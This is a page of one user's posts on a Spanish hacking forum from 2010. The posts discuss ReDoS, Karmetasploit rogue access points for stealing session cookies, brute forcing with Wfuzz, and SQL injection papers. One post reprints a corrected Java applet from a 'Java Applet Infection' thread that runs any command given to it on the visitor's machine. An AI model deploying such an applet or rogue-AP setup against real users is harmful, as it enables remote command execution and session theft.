elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 ... 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 [33] 34 35 36 37
321  Seguridad Informática / Nivel Web / Re: Vulnerabilidades en Expresiones Regulares, ¿cómo? en: 4 Febrero 2010, 21:26 pm
un redos segun tengo entendido es algo así como que el tiempo de cómputo para determinar si la expresion es "valida" excede unos límites razonables, dándose por váilida la cadena entera, permitiendose así la inyección de caracteres especiales



segun entendí cuando lo pusieron por aqui... xD
322  Seguridad Informática / Hacking / Re: [Metasploit] Karmetasploit en: 2 Febrero 2010, 16:50 pm
Cita de: Snek35 en  1 Febrero 2010, 18:29 pm
pero si tienes un router AP conectado por lan al pc, solo habria que ejecutar el karma.rc no?


vamos a ver el esquema es el siguiente


INTERNET ---> tu_router ---> tu_pc ~ AP VIRTUAL  <------ pc_victima


con tu pc creas una conexión AD-HOC al otro pc, que a través de ti reciviría ( o no, segun se configure ) acceso a internet. Está claro que si no tiene acceso a internet, de poco o NADA va a servir esto... pues la gracia es robar cookies sesiones en general y demás info.
323  Seguridad Informática / Hacking / Re: [Metasploit] Java Applet Infection en: 2 Febrero 2010, 11:31 am
Vale reescribo xD:

El codigo java que has puesto está mal en varias cosas.. ( ya que copias, copia bien campeón xDD )

para empezar, no es "Try" sino try, tampoco "Catch" sino "catch", es decir, esas dos palabras en minúsculas. Por otra parte:
Código:
f = Runtime.getRuntime().exec("first");

está mal, es:

Código:
f = Runtime.getRuntime().exec(first);

es decir, sin las comillas, lo demás perfecto, un saludo! xD

pongo aquí el codigo entero bien... ( de todas maners en los otros posts si están bien escritos )


Código:
import java.applet.*;
import java.awt.*;
import java.io.*;
public class MSFcmd extends Applet {
	public void init() {
		Process f;
		String first = getParameter(first);
		try {
			f = Runtime.getRuntime().exec(first);
		}
		catch(IOException e) {
			e.printStackTrace();
		}
		Process s;
	}
}
324  Seguridad Informática / Hacking / Re: Fuerza Bruta con Wfuzz y Tuenti [DUDAS] en: 1 Febrero 2010, 16:01 pm
no creo que los chicos del tuenti sean tan descuidados como para dejar recaer la seguridad de una gran comunidad sobre un captcha, supongo que a los X intentos ( includos con captcha ) banearán IPs o algo similar...
325  Seguridad Informática / Hacking / Re: [Metasploit] Java Applet Infection en: 1 Febrero 2010, 15:50 pm
muy buen post Shell Root. Por qué no te anímas y haces una recolección de todos tus posts abiertos? Estaría muy interesante a la larga contar con todos ellos reunidos ^^

Un saludo!
326  Seguridad Informática / Nivel Web / Re: vulnerabilidad en hi5 beta en: 1 Febrero 2010, 15:19 pm
Cita de: ▬▬▬▬► braulio23 ◄▬▬▬▬▬ en 31 Enero 2010, 11:02 am
SDC trabajaba en hi5 así que me da la ligera impresión de que no vas a encontrar nada.


estás seguro de eso? pq hace un par de años encontró una vuln ahi y dio alguna charla sobre worms en redes sociales...pero trabajar ahi? :/ a ver si se pasa por aki y nos saca de la duda xD
327  Seguridad Informática / Nivel Web / Re: Inyeccion SQl Server. en: 30 Enero 2010, 13:29 pm
ups, ya los pegué, weno iwalmente los dejo ahi por si a alguien le sirve, my apologizes! xDD


por cierto, te cito lo que pone en la introducción del primero de ellos


Citar
This document discusses in detail the common 'SQL injection' technique, as it applies to
the popular Microsoft Internet Information Server/Active Server Pages/SQL Server
platform.

estás seguro de que no sirven? :/

un saludo
328  Seguridad Informática / Nivel Web / Re: Inyeccion SQl Server. en: 30 Enero 2010, 13:26 pm
Aquí tienes el par de papers de advanced sqli, están en ingles... asi que... xD eso:


www.ngssoftware.com/papers/advanced_sql_injection.pdf         [1 parte]
www.wisec.it/docs.php?id=1                                                    [2 parte]
329  Seguridad Informática / Hacking / Re: Problema DNSNIFF en: 27 Enero 2010, 23:57 pm
respecto a lo primero, prueba con algun sniffer tipo wireshark y observa si estás realmente "en medio"
330  Seguridad Informática / Nivel Web / Re: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python] en: 25 Enero 2010, 14:33 pm
Cita de: Anon en 24 Enero 2010, 23:28 pm


No, this well here, apparently is the same flaw affecting the vBulletin.

It is common that when you see a fault in a CMS also appear in other CMS

Regards



No, it is well placed here, apparently is the same flaw that affects the vBulletin.
It is common that a flaw seen into a CMS also appears in other CMS.

regards




espero no molestar por tomarme la libertad de corregirte, un saludo
Páginas: 1 ... 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 [33] 34 35 36 37
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines